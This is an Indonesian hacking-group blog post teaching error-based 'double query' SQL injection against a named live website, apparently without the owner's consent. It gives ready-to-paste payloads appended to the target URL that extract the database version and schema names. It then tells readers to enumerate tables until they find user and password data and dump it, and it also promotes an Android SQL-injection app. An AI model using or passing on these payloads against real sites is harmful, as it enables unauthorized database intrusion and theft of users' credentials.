input license here

Report Abuse

Search This Blog

Featured Post

Download Aplikasi DroidSQLI Mods v1.0

Assalamualaikum,halo pengunjung selamat datang di blog Bomber Cyber Army, pada artikel kali ini saya akan memberikan Download Aplikasi DroidSQLi Mods v1.0. Droid SQLI DroidSQLi adalah aplikasi yang sangat mengagumkan dan sempurna untuk meretas dan m…

Sql Double Query

Assalamualaikum kali ini saya akan materi tentang sql double query 

https://irandesign.ir/project/show/id/29 

ni buat live target

awal awal w ksih tutor cara print versi nya


+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+CONCAT(CAST(VERSION()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1

tu buat xploit nya tinggal tempel di web

https://irandesign.ir/project/show/id/29+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+CONCAT(CAST(VERSION()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1

bakal jadi gini

 

nah nanti bakal muncul versi dari database nya

kalau udah lanjut ke print database() nya

+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1

ni xploit buat print nya

https://irandesign.ir/project/show/id/29+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1

nah jadi gini

tu bakal ke print

kalau udah lanjut ke print table
nah nnti di minta tu buat nama databese nya
disini w pakai dh hackbar aja biar enak jelasin nya

nah masukin sesuai nama database nya
kalau udah bakal gni

setelah tu mainin limit nya
sampai ketemu table db user/pw
nah kalau dh ketemu tinggal dump data nya aja
Done

Oke segitu aja materi
Mohon maap jika ada yg salah dalam kata maupun materi nya

Silahkan di pelajarin dan semoga bermanfaat 

Sekian terima Kasih 

Materi by = Danz

Support by All Member Bomber-Cyber-Army

Jangan lupa visit terus blog Bomber-Cyber-Army,,Karena bakal ada materi-materi baru yang bisa bermanfaat bagi kalian hehe



Related Posts

1 comment